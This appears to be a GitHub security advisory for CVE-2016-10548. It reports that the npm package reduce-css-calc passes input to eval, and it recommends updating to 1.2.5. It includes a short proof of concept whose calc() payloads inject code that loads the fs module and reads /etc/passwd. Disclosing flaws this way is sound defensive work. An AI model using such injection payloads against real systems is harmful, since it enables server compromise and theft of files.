Affected versions of `reduce-css-calc` pass input directly to `eval`. If user input is passed into the calc function, this may result in cross-site scripting on the browser, or remote code execution on the server.

## Proof of Concept

```
const reduceCSSCalc = require('reduce-css-calc');
console.log(reduceCSSCalc(`calc( (Buffer(10000)))`));
console.log(reduceCSSCalc(`calc( (global['fs'] = require('fs')))`));
console.log(reduceCSSCalc(`calc( (fs['readFileSync']("/etc/passwd", "utf-8")))`));
```

## Recommendation

Update to version 1.2.5 or later.

Affected Packages

npm reduce-css-calc

Affected versions: 0 (fixed in 1.2.5)

Related CVEs

CVE-2016-10548

Key Information

GHSA ID

GHSA-4662-j96g-mv46

Published

June 7, 2018 7:43 PM

Last Modified

August 31, 2020 6:12 PM

CVSS Score

9.0 /10

Primary Ecosystem

npm

Primary Package

reduce-css-calc

GitHub Reviewed

✓ Yes

Dataset

Last updated: July 4, 2025 6:15 AM

Data from GitHub Advisory Database. This information is provided for research and educational purposes.